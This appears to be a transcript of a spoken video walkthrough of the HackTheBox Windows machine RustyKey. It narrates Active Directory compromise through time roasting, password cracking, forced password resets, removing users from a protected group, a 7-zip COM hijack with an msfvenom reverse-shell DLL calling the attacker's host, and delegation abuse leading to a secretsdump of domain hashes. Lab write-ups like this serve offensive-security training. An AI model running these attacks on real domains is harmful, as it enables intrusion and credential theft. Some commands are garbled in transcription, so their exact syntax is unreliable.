What's going on YouTube? This is IPSec. I'm doing RustyKey from HackTheBox, which I find to be a very well put together Windows machine that has a nice balance between Active Directory and general Windows exploitation. We start off with a set of credentials, which in reality we don't need because the first step is a time roasting attack, which doesn't require authentication to steal computer account hashes. However, without that previous access, it would be a complete guessing game to do the time roast attack. Once we get access to the computer account, we discover a path that lets us take over user accounts through adding ourselves to a group and changing the password. But there's a few tricks. Firstly, NTLM authentication is disabled, so we have to use Kerberos. And secondly, the user's in the protected objects group, which blocks a lot of our tools from working. Thankfully, we have the right to remove users from this group, which allows us to continue on to the box, which we find a PDF that indicates we have to perform a COM Hijack on 7-zip. However, the user that has access to the registry key is denied remote login rights, so after doing the same takeover we did previously, we use a tool like RunAsCS to switch to this user. After the COM Hijack, we gain access to an account that can perform resource-based constrained delegation to get root. There's a lot of cool things, so let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it RustyKey, and then the IP address of 10.10.11.75. This can take some time to run, so I've already ran it. Looking at the results, we have quite a few ports open. It looks like 11. Because we have 989 there. And the first thing I see is DNS on port 53. The banner says Simple DNS Plus, and this is the default banner of Active Directory. So I always scroll down and confirm, yes, AD is installed, and it's giving us the domain name right here. So let's go ahead and copy this, and then do sudo v etc host. I'm going to add this to our host file. So 10.10.11.75 rustykey.htb. And now there's something that is somewhat unique here. I'm used to seeing a lot more information. Normally LDAP has like an SSL certificate, especially if like Active Directory Certificate Service is installed. And then you'd see like RustyKey dash, maybe like LTD-CA or something as the certificate authority. We're not seeing that here. Let's see. I can actually be a little bit of spoilers, but let's just go back to an old box. Let's say certificate, and then we can do nmap certificate.nmap. And we see this information, right? We have a bunch of SSL. We can get the host name from it. So there's a lot of information here when certificate services is installed. We're not getting that on this box. So most likely AD is just a vanilla install and not much customization has happened. Let's see what other ports we have. Kerberos, that's not surprising. 445, there's going to be SMB, LDAP, and that's about it. Looking at the scripts, we can see there is an 8-hour clock skew. So if we want to do any Kerberos related things, we have to make sure we set our time correctly on this box. This is a assumed breach box, so we will start out with a set of credentials. But before we get to this, let us just quickly run a NetExec. And I'm going to get the host name of this box because I always like adding that into my host file. So I'm going to do a nxc smb 10.10.11.75. And this should be able to give us the host name, which is just DC. So let's go ahead and add this to our host file. So we can do dc.rustykey.htb. And then I guess let's generate a Kerberos file. This is something you should always do on Active Directory machines because it helps your Linux machine talk to it if you ever want to do tickets, right? So I'm going to do -- generate KRB5 file, I want to say. I'll call it rustykey.krb. And let's see. I just want to look at this real quick because I did specify the IP address here. I know in old versions of NetExec, you have to use the host name because it would just put the IP address in this KRB5 file, but it looks like it's correctly pulling everything, right? I see admin server as the DC, and that's what I want to see. So let's do a sudo cp rustykey to etc krb5.conf. And let's see, what else do we want to do here? We can probably start off with testing our credentials. So I'm going to go back to my nxc command, and then we can do a -u. Looks like I already overwrote. Oh, no, there we go. There it is. And then we can do a -p, and I'm going to put the password in quotes because we have some special characters there. So this is just going to tell me if our credentials are correct. We get status not supported. So I'm guessing NTLM is disabled, but we can just add a -k, and this is going to do a Kerberos authentication, and hopefully this works. We get a clock skew error, so let's do sudo NTPDate 10, 10, 11, 75. This is going to sync our time to the box. If you do this and your time goes immediately back, you're probably having time sync enabled in your VM. So go into VirtualBox or VMware and disable time sync there, because the OpenVM tools is just overriding what you're trying to do. But now let's go ahead and run this again. Third time is the charm. Hopefully we get authenticated here. And yes, there we go. So we have authentication. We could try some things like -- shares to see if there's open file shares on this box. But in reality, the thing I normally do is just run rusthound from here. So I'm just going to do rusthound. Let's go up here. And I want to say we want to do -d RustyKey.htb -u Parker-p. And this may be all we need to do. I'm blanking on all the flags, but I want to say this is good. Yes, it is. We are connecting and we're getting a bunch of data. Awesome. So I'm going to go ahead and start up Bloodhound. I have it saved in opt Bloodhound server, docker compose up-d. That is starting. If we do an ls, we have the JSON files. So we should be able to go to localhost 8088 and probably like 15 seconds and then get access to Bloodhound. Uh-oh. My box has completely froze. I'm not sure what to do here. Oh, there we go. It's coming back. It's still waiting for the GraphDB to start. I'm probably going to pause the video and we'll come back when it comes. Nope, there we go. Awesome. So we can just do admin and then please subscribe. I think 1 exclamation point is my password. Maybe exclamation point 1. There we go. We get logged in. And we want to upload the JSON files. So let's go to HTB. Where is RustyKey? There it is. Copy all these JSON. Upload. And administration. It is ingesting. And this is going to take a minute or two to ingest. So I'm just going to pause the video and we'll come back when this is all done. Okay, we have all the data ingested. So let's go over to Explore. And if we ran a bunch of these pre-built Cypher queries, we really don't see that much. Looking at domain admins, we only see 1. That's a bit odd. I expected to see like 2 because there's 2 domain admins here. Let's see, is there a shortest path to domain admins? Shortest path trusted. There we go, shortest path to domain admins. Let's look at this, and what do we see? There we go. We have BackupAdmin that is a member of Enterprise Admin that has generic right to domain admins. So maybe because Enterprise Admin isn't a member of domain admins, that's why it's not showing up? Yeah, I'm guessing that's why. I wonder if that query should end in... Nope, we have owner SID 512. I'm confused real quick. If we go back to this one Cypher query, where is it? All domain admins. We see NT object ID ends in 512. And we're a member of administrators, and this ended in 512. Right? Owner SID. Oh, this ends in 544. Let's see. What if I edited this? Maybe this is the better way to show domain admins? I don't know. But here we can see now domain admins and enterprise admin. I'm not sure if that's correct, but hopefully start like playing around with Bloodhound and understanding these things, because it's a really powerful tool. A lot of the default things that just don't really get you anywhere, right? Let's go over to the search. We had what user do we own? Because this is the assumed breach box. What user do we run this with? RR Parker. So this is also normally where I start. I go to my user, we look at him, and let's see. If we go outbound control, we have nothing there. We can add to owned. Oh, yeah, add to owned. And then we can do shortest path. And then what is it? I'm trying to search for shortest from, or shortest paths from owned. There we go. Run this. And all this shows is we're a member of domain users that has users. So we really don't have any information on Bloodhound. Now, one thing you can do that's really handy, especially in CTS where the Active Directory environment is small, is just look for all edges that have unique things said about them, right? So if I do a match and we change this to the source, grab the relation to a target, and then we want to show sources that are computers or sources that are user. If we did group, it will get very, very messy. It's even going to get messy here. If I just do return P, we're going to see a lot of data here. And that's because every user and every computer object has this member of property, right? So what I'm going to do is filter this out. So we're going to say, and type relation is not member of. And I think I have to do that. And now we have something very simple. We have IT computer 3 is a member of helpdesk. If we look at what helpdesk can do, if we go to outbound object control, helpdesk has force password change over EE.REED. We have generic write force password change over DD-Ali. And we have some more force password changes over users. If we look at one of these users, let's go with GG Anderson. We can go to member of. We see protected users, so we can't do some authentication mechanisms, but they're also remote management user, right? If we look at this group to see who's a member of it, click on this. Members of this. So all these users can probably win RM into the system. So these are the users we want to get to. And the IT computer 3 object actually had a path, right? The IT computer 3 had add self over to the help desk. Now the question is, how can we compromise this, right? With computer objects, there's really 2 ways that you can easily compromise them. The first is if they have that legacy. If they're really old or a member of like Win2K pre-authentication, it's possible their computer name is going to be also the password. I forget exactly what box we use that on. I want to say it's vintage, but if you go to ipsec.rocks, that will show it. So, but if we look at member of, it's only domain computers. So that's probably not going to be the case. Now, there is one other thing that is very interesting about this box. If we look at password last set, we see it is December 27th, 540. Now, if we look at when this was created, where's the creation? That's password last set. It's created December 26th. So this is 1 day difference, right? Computers in Active Directory should change their password automatically every 30 days. This is only changed 1 day later. So this is probably going to be a user set password, which means it is weak. If we look at any other computer object, I'm going to go, let's say, IT computer 3. That's the one that this is. Let's do IT computer 2. We can see it is created December 26th, and the password last set is December 26th. So this probably has the auto-generated password, but IT computer 3 doesn't. And what makes this interesting is there is a TimeRoast attack you can do against computers, which will let us get the password hash essentially of it. And NetExec has something for us that we can use. So I'm just going to do NetExec. Hold on, let's go back to NXC, SMB, and we're just going to do the module TimeRoast. I think that's all we need to specify. And there we go. It's going to start time roasting. And it's going to just brute force everything with an RID brute. And then we get potential hashes here. So what's happening is we're sending some weird NTP thing to a computer object, and it's responding back with a, I think a pre-authentication ticket or something like that. That then is hashed with the NTLM of the computer account. And since it's hashed with that, we can potentially try to crack it. Or maybe the time is encrypted with the hash. I forget exactly how it exactly works. I'm sure if you Google like TimeRoast Active Directory, you can get some information about it. But typically, a lot of Kerberos tickets, I want to say it is the current time that is hashed with the NTLM hash of the account. And that's generally why you can crack Kerberos tickets, right? So I'm going to copy all of these hashes. And then we're going to go over to the Kraken. This is just where I have Hashcat. And if you don't automatically crack this, make sure you update Hashcat because this is a relatively new technique. I want to say within the last year. So I'm going to do v hashes rusty-time, and I'm going to paste all of this. And then we also, I just realized, have to filter this out. If I do awk, let's see, if we cat it, we want 1, 2, 3, 4, 5. So I'm going to say awk print 5. I'm just going to copy that to T, and we can move T over top of our thing. And now we just have a hash file of everything. And then this number here, this is going to be the RID of the computer account, which is a username essentially. So when I try to crack this, I'm going to give it the username flag. So when it cracks something, I can go back and see which hash that correlated to. So let's go /hashcat, paste in the hashes, then opt word list rocku.txt. And it should automatically detect this. So let's see. I said we had to, and I didn't, specify the -- user. So Hashcat knows we added the username. And there we go. One has cracked really quickly. So I'm just going to do the -- show now. And we see 1125 is Rusty88 bang. So if I go back over to Bloodhound and I search for 1125, IT Computer 3 comes back. And that is because it has that SID, right? We can see that here. So IT Computer 3 has now been owned. We have the password. I'm going to go and add this in creds.txt. So we can say creds.txt, IT Computer 3. What was it? It was Rusty88 bang, I want to say. Rusty88 bang. I hope that's right. Cat it. Let's do NXC SMB 10.10.11.75. IT Computer 3. Rusty88 bang. Is that going to crack? Status not supported. Kerberos because NTLM is disabled. Please authenticate. Yes, it does. Awesome. If we had an invalid password, it's going to say not valid, right? Yes. So we have successfully cracked that IT computer account. So this had add self over to the help desk. And then help desk had a lot of edges. And I do want to call something out here. If you ran Rusthound pretty much just before today or yesterday, it would not find these edges. There was actually a bug in Rusthound that me and OXDF had fixed. So if we went to Google, let's go GitHub Rusthound, go here, go to the issues. Let's go and also look at closed issues. You can look at everything here of what went on, but a lot of changes went into Rusthound very recently to add this. If you were just solving the box and ran into a wall, I would recommend running another tool. In this case, you'd have to run like the Bloodhound Community Edition, and that would also get this flag. So if you ran both Rusthound and the Bloodhound Community, then you'd see this edge. If you just ran Rusthound, it wouldn't work. Sharphound is by far the most accurate collector. However, it has to be ran from Windows, and at this point, we don't have a shell in the box, so it becomes a little bit of a pain to run Rusthound. But again, big thanks to OXDF. You can look at his issue here, which he used Claude in order to automatically fix this, which was pretty cool. But yeah, make sure you always keep your tools up to date. And that's another good thing about just solving boxes. If you're looking to get a bigger name for yourself, you'll find a lot of bugs just in tools that then you can go back to the creator or try to fix them yourself and then make the open source ecosystem better. But I'm going to get off my soapbox now and let's go back to looking at this path, right? We said GG Anderson was a member of WinRM. Actually, I think all of these users may be. If we looked at BB.MORGAN, one thing sticks out here. No, GG Anderson, I think one thing sticks out. That user, man, there we go, is disabled. We see enabled false. So BB.MORGAN is enabled. EE.REED, if we look at what they're a member of, they are a member of users. So they're a member of support as well. So we want to go either to the BB.MORGAN or EE.REED user. The other thing you could just do, if we now go to IT-Computer, actually we already marked them as owned. So I bet if we did shortest paths from owned principals, it becomes a lot more interesting, right? Owned objects, run it. Here we go. So we can see IT-Computer, member of help desk, force password change. I'm surprised it doesn't have like Windows remoting and then WinRM to the DC. A little bit surprising, but not that, I guess. Let's see, what else do I want to call out? I know there's one other thing that I just can't seem to remember. Oh, we have, let's see. If we go back to help desk, outbound object control. We do have generic write over DD alley, right? So we can force password change and change principals or attributes in their Active Directory account. Now, this is mainly useful, I think, for like some ADCS attacks. I want to say it's 9 and 13 where you can change the UPN, and that allows you to impersonate users. Also, in a recent Insane box, we modified the UPN, created a ticket so the Linux box that authenticated with AD would trust the UPN, and then that allowed us to impersonate a user. I don't see Linux boxes, and ADCS was not installed to my knowledge, so this generic write, I don't really know what to do exactly with it, but it's just something to keep in the back of your mind. If you want to know more about those attacks, just go to ipsec.rocks, type probably UPN, and they'll bring up boxes related to that. But let's go ahead and do the attack to get into BB.MORGAN. They're enabled, yes. So let's go pathfinding, IT-Computer, BB.MORGAN. And we can show this attack, right? So they have add self, force password change. Awesome. So let's see this. I'm going to go and use BloodyAD. So we'll do BloodyAD -d RustyKey.htb host DC RustyKey HTB. User's going to be IT Computer 3. And then the password is going to be Rusty88 bang. And then we want to add the -k for Kerberos. And I'm going to do add, and then the help, we want to do group member. And we want to add ourselves to the help desk. So help desk, and then the principal is going to be IT Computer 3. So we're adding ourselves into the help desk group. Let's see. There we go. We have been added. And now we want to change the password to a user. I want to say that is going to be set. And we can just do password. The target is going to be BB.MORGAN. And I'm going to set BB.MORGAN to please subscribe, ! Password has been changed. So let's do a get TGT to get a Kerberos ticket for this user. So we can do get TGT. What is it? RustyKey.htb, BB.MORGAN, and then the password, please subscribe, bang. And we get this KDC error type. KDC has no support for the encryption type. And if we look at BB.MORGAN, they are a member of the protected users and protected objects. Now, protected objects will prevent a lot of just basic attacks. Maybe it's the protected users. Let's see, protected objects, Active Directory. I'm going to go to Google because I like those search results better. What does it do? NTLM. I'm going to add some keywords. It protects against a lot of like credential theft. It prevents you from having very long TGTs. So we can't get TGTs longer than 4 hours. Prevents a lot of delegation. We can't use DES or RC4 encryption types in Kerberos pre-authentication, and we can't use NTLM authentication. So those are the main things it does. And in packets get TGT, if you specify the password, it's going to use RC4. So that is why we can't do this. Now, one thing I would generally do is I would switch and use AES authentication, and you can generate the AES keys if you know the password. So let's see, AES key generation Python GitHub. Can I find this real quick? Yes, this is. This is another thing that'd be great if it just got imported into impacket. Because if we look at the get TGT options, there is no way to use AES key if you just specify the password. So we have to generate this AES key manually. So go here, let's do Python 3 vm.venv. And again, this is not going to work because I don't think AES is configured on the box, but I do want to show this type of stuff because these are the paths like I would generally go down, right? So we can do source to activate it. Let's do pip3 install requirements. And then we do Python 3 AES KRB keygen. We need to specify the domain, which is RustyKey.htb, the user. This is BB.MORGAN, and then the password is please subscribe bang, right? And there we go. It gives us the salt, and then we get an AES key. So if we try this, where was my get TGT? Let's get rid of the password. I think it's -AES, but let's do a -help AES key. We still get no support, right? So AES did not work here. We don't know exactly if it didn't work or we did something wrong. We can kind of confirm we did something wrong by doing a user that we have. And if you use the user you start out with because it's assumed breach, it's still not going to work. I want to say it needs like pre-authentication. So I'm going to use the computer object and we can get something different. So let's do -user IT computer 3. And the password was Rusty88 bang. And then there's also a flag if you're doing it with a computer object, the -host, because AES keys for computer objects are salted slightly differently, right? We want to add host, IT computer 3, and then the fully qualified name. So the salt is done a little bit differently. I'm going to copy this. And now let's go back to get TGT. I'm going to give it this AES key. And the host is going to be IT computer 3. And no support for this encryption type. If I change a single thing, so I change that B to a C, pre-authentication failure. So we know that it's passing pre-authentication with this AES key, so we generate it correctly, and then the error is coming, right? If you don't have pre-authentication enabled, so this is going to be any like non-Kerberoastable user, you'll never get this message and you'll always just see this error message. So you can't confirm you generated the AES key correctly. But with computer objects, we're able to do this. So let's see. This was a big dead end, but we do have the ability to remove the bit. So if I do BloodyAD, let's see, -d, RustyKey.hdb, let's just do --host like this. And instead of set password, what we're going to do is remove group member protected objects IT. Insufficient access. I bet this is because it removed us from the group. Run this again, add it to the help desk group, run it. And there we go. We have removed that. Let's see. Let's set the password again. Okay. And then I'm going to now do a get TGT. And we save the ticket, right? So because we removed the protected objects from the user, now we can do RC4 authentication and get the TGT. We could also validate this by doing a describe ticket, BB.MORGAN.cc cache. And we can see where is encryption type. There we go. Encryption type is RC4 HMAC E type 23. So again, because it was in the protected user, it was refusing to give us this ticket. But because we removed the protected user, that's why you could get this ticket. Now, the one question you should be asking is how I knew I could just remove users from that protected objects group. And honestly, I don't see it in Bloodhound. I'm pretty sure when I was solving this box, I did see it. And that may be because I ran multiple Bloodhounds. So I want to say the help desk did have a permission that I'm not seeing. Let's see, SAM account, outbound. We only have all these forced password changes. If I go to protected objects, let's go to inbound control. Let's see. I don't see much. We could go back to BloodyAD. I'm going to make sure I'm in the group. And then I'm going to do a get-h. Let's see. We want to do get writable. This is always good to run when you start getting into dead ends. And we can see we have write access to protected objects. So why did not Bloodhound not show this? I'm actually going to run the Python ingester. So let's do nxc ldap dc RustyKey.htb user rr parker password. Let's go ahead and grab this. Paste that. We can give it the Bloodhound flag, Kerberos collection, all DNS server is 10.10.11.75. This should now write everything we want. It's going to take a little bit to run, but this will get us a zip file. We'll upload it to Bloodhound and then look at our permissions again. So I'm debating if I want to just pause the video right now because it's looking like it's taking a little bit of time to do this. So yeah, I'm going to pause the video and I'll resume when this is done. Oh, as I was about to go pause it, it finished. So no need to edit there. Let's go ahead and move this object into a directory, go back to Bloodhound, administration, upload files. And I wonder if that's going to be one of the files that failed to ingest. That could also be the case. I know there's a bug with that. Older versions of Bloodhound process it, but the newer versions don't. I want to say some like value is blank, which is causing a validator to fail. It's something silly. So we have this. Upload is done. It is ingesting. Let's see. That would probably be, we'll see what edge it is. It is complete. So I can go to explore. Let's now go back to the help desk. What outbound permissions do you have? Are you going to magically show up? I see 5 now. There we go. Oddly, it's just showing add member. There are other edges to this. So let's go inbound control. Do we see this? Help desk. So it's not showing we have write. It's just showing add member, which is equally as interesting. But this is indication that something can happen there, right? Make sure the computer's not there. Yeah. So always helps to run multiple Bloodhounds, I guess. let's go ahead and progress, right? So where was I? We ran Bloodhound, we got a TGT, we're the user, right? So I'm going to do KRB5 CC name is equal to our TGT that we have got. Then we can say evil winrm -i dc RustyKey.htb. The realm is RustyKey.htb. And if we just look at the files here, we don't have much. I want to say, is it tree/f I'm used to running? Yeah, we have a internal.pdf in desktop. So let's go to desktop, and then I'm going to download internal.pdf, and we'll see what this file is. So I'm going to open internal PDF, and we get a memo. So as part of our support utilities rollout, extended permissions access has been temporarily granted to allow testing and troubleshooting. This has mainly helped to streamline ticket resolution related to extraction compression, so probably some type of zipping by the finance and IT teams. Some registry level adjustments are expected during this phase. Let's see what else we have. Unrelated. The permission change is logged and will be rolled back once the archiving utility is confirmed stable. Let DevOps know if you encounter anything. Did I miss any keywords? Oh, there we go. Some newer systems handle context menu actions differently. So this is going to be related to like COM objects and CLSID. You want to do Googling around this to understand exactly what's going on. I'll explain it once we get a little bit further, but the thing we have to do is switch over to, I don't think we actually have to yet. I was going to say we have to switch over to the support user, but I don't see anything in here that's telling me support has a unique permission. So I'm going to keep going full steam ahead as this user and then switch over to support when something tells me to. So let's see, we're BB.MORGAN. They were talking a lot about archiving utilities, right? So I'm going to go cd progra1 because I hate typing like program files and program files x86. And man, that crashed. Progra1. There we go. I go in program files and we see 7-zip is installed. So that's probably the archiving utility they're talking about. We do a dir. I don't see anything. So I was looking for like WinRAR and things like that, but I just see 7-zip. The other thing it's talking about is the context menu thing. And that relates a lot to like COM, which is a component object model. And essentially that enables Windows programs to share functionality, right? So for example, like 7-zip, it's likely that we want Explorer or file browser to be able to go into 7-zip files, and it treats them like virtual folders, right? You've double-clicked a zip in Windows and it's just went into that. How that works is there's a COM object that points to like this type of file, uses this DLL. So when Explorer clicks it or another program tries to open it, it's going to use that DLL in order to process it, right? So that's the whole purpose, I think, around COM objects and things like that. And that all works under like CLSIDs. I forget exactly what that stands for, but let's go ahead and query the registry for CLSIDs that have zip in them. So I'm going to do Req Query and then HKeyCR. This is HKey classes root, I believe, and then CLSID, and we're going to search for zip. And this should take probably another 5 to 10 seconds to run. I don't remember this taking a while, but looks like it may, because I typed it. It's Req Query, not Req. So let's just copy and paste this. There we go. And whoops, these are all the CLSIDs that have zip, right? And here is 7-zip's one right here. So we can see this CLSID is going to use 7zip.dll. And if I wanted to, we could look at the permissions of this. So I'm going to copy this, and then we can use PowerShell's getACL command. And then in most registries, you can just do like cd, let's do current user, for example. And this is going to do a like weird virtual drive, and now we're in the HKey current user thing. There is no one for HKCR. You can do a new PS drive and create one, or you can just reference it a slightly different way. I'm going to do it the slightly different way. My hands are off the wrong thing, so we'll do getACL. And then what is it? It's going to be registry : HKCR. And let's see, we don't need HKey classes root like that. I think this is it. So if we do this getACL, let's do a format list. There we go. This is 7-zips CLSID, and we see the support has full control. So in order to modify this registry, we want to become the support user. And going back to Bloodhound, let's look at support. Look here. Let's see. Members, EE.REED is a member of support. So we want to do the same exact attack, except now we want to take over EE.REED. Let's see, do I have BloodyAD commands here? Yep, I do. So let's do the add command again to make sure we're in IT Computer 3. We already are. That's good. So now we should be able to set the password to EE.REED. And then we also want to remove protected objects. And EE.REED is in support, not in IT. So we're going to remove it from support. And now we should be able to use the getTGT command again, right? So let's do EE.REED. And we have the ticket. So let's do now a KRB5CC name, EE.REED, and log in. We get some weird error. Invalid token was supplied. Try it again, and we keep getting it. And I even tried like switching over to devious WinRM. Let's see. We can do -K, username, EE.REED, password, please subscribe. Let's do, I did Kerberos. I need a realm, right? Yeah, DC, RustyKey.htb, and then we'll give it the target. I think this is all we need. And even this fails, right? Maybe it's not fully qualified. Nope, it is. So the next thing I tried was like, let's try NetExec. So we can do NetExec, SMB, 10.10.11.75, EE.REED, password, please subscribe, Kerberos, and status login type not granted. So EE.REED is definitely a member of remote management users, but there's some permission that is blocking remote access to EE.REED. So they can only do local logins, which sucks for us because that's what's preventing us from doing WinRM. However, since we have a shell as BB.MORGAN, we can upload RunAsCS and then switch over to this user with a local user context. So that's what we're going to do. If I remember, I'll show looking at secedit to look at this SE deny remote access right for the specific user. But let's go ahead and go back to BB.MORGAN. And then I'm going to go into program data because this is where I like just writing files to on Windows. Let's copy opt sharp collection. What is the next folder? Net framework for, let's do 5NE, and then RunAsCS, do RunAsCS.exe. And now we can, actually, let's put it in dub so we can easily copy it. And then we can do a wget http 10.10.14.8 8000 RunAsCS.exe, RunAsCS.exe. Start a web server. And I know you can also use the upload command in EvoWinRM, but I just find it works better with wget because I think what's going on under the hood there, it converts the file to base64 in chunks and then like unbase64s it on the console, writing to a file. It's messy. I find this to be much more reliable with just doing it over web. Let's make sure we copied it. We did. Awesome. So let's say EE.REED, password was please subscribe. We'll put these in quotes. Let's do PowerShell -R 10.10.14.8 9001. RL wrap NC LVNP 9001. Does this load? There we go. Awesome. So now if I do who am I? I am the EE.REED user, which means I'm going to be able to modify that registry now. Let's see. Where was it? I want to get my ACL command so we can put this on a clipboard because we're definitely going to need it. But first we need to get us a DLL that will send us a reverse shell. So I'm going to use MSFvenom for that. So you do MSFvenom. Payload is Windows x64 shell reverse TCP. Format is DLL. Let's call it rev.dll, not del. lhost is equal to 10.10.14.8. lport is equal to 9001. That should do it. As a reminder, if you did like shell/reverse TCP, that's going to be a staged one. So it's going to reach back to you expecting more DLLs to go ahead and inject. This is the much better way to do it for HackTheBox machines because you don't have to run like MSF handler to get the reverse shell. So there we go. We have the DLL. Let's copy it to www. Let's go into CD program data. Start a web server back up. wget http 10.10.14.8 8000 rev DLL. We'll call it rev DLL. There we go. We have downloaded it. So now what we want to do is a set item property to write that registry key. And that's the key we're going to write because that's what was pointed to 7-zip. I bet if I do, was it? Is it get item? We can see in proc serve, the property default, it's pointed there, right? So we want to do a set item. And then we want to change the name default to the value C:\program data rev.dll. What? Set item. Couldn't find name. Is that case sensitive? Let's do capital V. Am I specifying something wrong? The set item property. There we go. Not set item property. I thought it would like truncate the name, but I guess it didn't. That's not dying. Let's kill that pane. NC LVNP 9001 RL wrap. Let's do that get item again to make sure. It is set. So what we're doing now is waiting for a user on this system to open up a 7-zip file. And if we did everything correctly, when they try to open up 7-zip or open up the archive, it's now going to access our DLL, which is going to send us a shell. And hopefully I did the MSFvenom command correctly. Maybe we should have tested that before doing this. but I'm just going to give it, let's say, 2 minutes. Oh, as I was talking, we got a shell. Awesome. So let's do whoami/all, and let's just do whoami. So we are mm.turner. So let's go here and look at mm.turner. And let's see. Member of. We are a delegation manager. And I should have just looked at outbound control. We can see mm.turner is a member of delegation manager that is allowed to act on the DC. So this is essentially going to allow us to set up RBCD, resource-based constrained delegation. And I'm pretty sure we also have talks about this. So I definitely recommend watching one of these videos. Maybe Vintage is the good video, because that one we, what is it? We abuse the pre-2K authentication to log in as a machine account with the host name, and then we do resource-based constrained delegation at the end. So that's another good one to watch, but we're going to perform this attack. And the easiest way to do it is, let's see, we have to find a user we want to delegate, right? And if we look at administrator, I don't think we can use administrator. Let's see. I think it's because it's marked sensitive. Do we have a delegate flag? Trusted for constrained delegation, false. The other user we saw was BackupAdmin, right? If we look at BackupAdmin, let's see, are they marked as sensitive? False. Trusted, false. There's something set about the administrator that blocks us from doing it. Let's do getAD user administrator properties star. Oh, I'm not in PowerShell. getAD user administrator properties star. Do we have any delegated? It's not trusted. Account not delegated. There we go. So that's what's going to prevent us. I know Bloodhound shows it somewhere. Let's try BackupAdmins. What was it? BackupAdmin? Yep. Account not delegated is false. So that's what's going to enable us to do delegation here. And on previous boxes, we did this from impacket. We don't have our user's password, so it's going to be hard for us to use impacket for this. However, we can just do everything from PowerShell, right? All we have to do is set the AD computer, DC, principals, allowed to delegate to account, IT computer 3. And for this to work, we just need to know the computer password for this, right? And a lot of the attacks, we're just using our ability to create computers, because when we create a computer, we can specify the password, and then we can create service tickets manually. We don't have to create a computer account in this case, because we already know IT computer 3's password. So we do this, and now if we do a getAD computer DC, I should have done this before. Is it principals allowed to delegate to account, I want to say. Let's see. We can see IT computer 3 is allowed to delegate. So this means IT computer 3 can now create Kerberos tickets that the RustyKey domain is going to trust. So to wrap this all up, we can finally exit here. Let's do a getST for get service ticket, and then RustyKey.htb IT computer 3. And that computer account's password is Rusty88 bang. And then we're going to give it the Kerberos flag. We also got to give service principal name. We'll do CIFS. That's going to enable us access to SMB. So RustyKey.hdb. And we're going to impersonate the BackupAdmin because that was also an administrator in this box. So now we have this ticket. So let's just do a secrets dump. Let's do careb5 cc name is equal to that secrets dump, and then RustyKey.hdb. Is this all I need? Status not supported. Let's see. Do we still have it? We're still allowed. It's probably my secrets dump command that is wrong. I thought it'd pull a lot of information from the ticket, or from the, the ticket, but maybe it doesn't. Let's just specify the full thing. RustyKey.hdb, BackupAdmin at DC, RustyKey.hdb. Let's specify no pass. There we go. This looks better. So now we're going to start grabbing all the hashes for the accounts, and we should be able to log in with the administrator account. There we go. We have the local SAM for administrator. I'm just going to copy this and see if we can log in. Maybe administrator is a protected account and we can't just use this NTLM willy-nilly, but I'm not positive about that. So let's do NXC, SMB, 10.10.11.75, user administrator. I think H for hash. Is that right? Status not supported. Kerberos. KDC principal unknown. So I don't think we can. That's also the local administrator. I'm not sure if that includes the domain account. So maybe we'll get a different hash for this administrator, or we'll just have to remove administrator from protected object, and then we can log in as them. We'll figure out in a second. Is that the password? Did we just get the password this way? Rusty RC for... Where'd default password come from? I have no idea where this came from, or how they get set. Let's see. Definitely need -K. Let's see. KDC principal unknown. Looks like impacket crashed on me, but I think we get to the administrator hash. And this definitely does look slightly different, right? So we have it begin with F7A, and up here, this began with E3. So the difference is this is the local database. When you make a domain controller member of the domain, then it avoids using the SAM for local logins and then switches over to ntds.dit. So let's now try NetExec again. We'll specify this hash. And does it let us in? Principal unknown, administrator. That is correct. Actually, it was not correct. Administrator. Let's do this hash. And come on, say pwned. There we go. So yeah, it helps if I type the name correctly, right? I should have known from the error message we were getting, like the unknown principal, right? KDC principal unknown, that's telling us like it doesn't know administrator. If we gave it a invalid password, this is going to give us something different, right? Pre-auth failed. So it helps to be able to read error messages, right? Because that was telling me right now I made a typo in the username. And these are the things that you just get from experience, right? Making typos in username is something that happens all the time to almost any red teamer and pen tester, right? Being able to recognize the error that's telling you did that, that is something that just comes from experience. So let's see. Now we should be able to just get a shell. I'm going to use ps exec. So we'll do administrator I bet that RustyKey password worked. This one. So NXC, administrator. We could have done psexec with the NTLM hash, but let's just see if the admin password works as well. It does. Awesome. So let's do, let's see, psexec.py -k rustykey.htb administrator like that, and then at dc rustykey.htb. Requesting shares, uploading, and come on. There we go. So we can do users, administrator, desktop, type, root.txt, and there we go. We get that hash. That definitely did not clear the screen. But the last thing I wanted to show is just doing a sec edit to export a lot of local policies and then showing the deny logon right to EE.REED. So let's do a sec edit, export, and we're going to write it to C:, program data, sec policy config. And this is something I just asked AI to do. So it's not something I have memorized. I was just asking, like, how do I look for the deny logon right privilege, I think is what I asked. And this is what it told me. So we can type this file and then do a find string on EE.REED, I think. Oh, we're in... I thought that was it in command prompt. Let's just switch over to PowerShell. Is my shell wonky? Hopefully this still works. Cat secpol.cfg. And we can select string EE.REED. Doesn't look like we got anything there. We can try looking at the group the user's in. So let's paste this and then type support. I wonder if select string is case sensitive. Looks like we're getting some things. So let's see. Here we go. SE interactive login right. Oh, there we go. SE deny network login right to the host, support, and delegation manager. So this is why EE.REED could not win or empty the box, because it has the SE deny network logon right. So hopefully you enjoyed this. So take care, and I'll see you all. Apologies for the sloppy cut, but the video's not over. After I recorded the video, I was playing more with this box, trying to figure out why Bloodhound missed one of the properties and exactly what the property meant. And in specific, I'm talking about how we knew we had access to this protected object, right? Because if I click on here and go into inbound, Bloodhound had missed the help desk having add member on this object. And this add member is kind of, I think, confusing, because this is actually like right property member, I believe. So if we have this add member, we can also remove it. So the Bloodhound Python code is not wrong. It's just, I think the edge is kind of misreading in the name, because normally you see like right property and then something else, but this is just called add member. If you can add, you can probably remove, I guess. I think that's what's going on, right? And if we look at the actual data from Bloodhound, from Bloodhound, it would be in groups. So I'm going to cat this file. We can do JQ dot. Let's go over to less. And then I'm going to look at protected objects. And if we look at all the aces, 512, I think this is administrator, probably domain, 519, all these 500s are going to be like standard default Active Directory groups, right? So I'm going to go and look at the Python data. And that was this one right here. So I'm just going to make dir t for a temp directory. Let's unzip this file, 7zx, there we go. And then we're going to cat, where's the groups? Right here, jq dot less, go to protected objects. And right off the bat, oh, this is, oh, here we go. Add member, principal SID right here. So this is showing the add member here. If I look at the SID, that is going to be the SID of helpdesk, I believe. Right here, yeah, object identifier, name is helpdesk. So the Python ingester collected it, but for some reason, Bloodhound didn't. And we're going to find out exactly why. But before I do that, let's just show one last thing. I always like knowing how to do things manually. So let's get back on the box. We're going to get a shell as BB.MORGAN. I'm going to do getAD group protected object, right? Is it object or objects? There we go. Because I wanted to get the 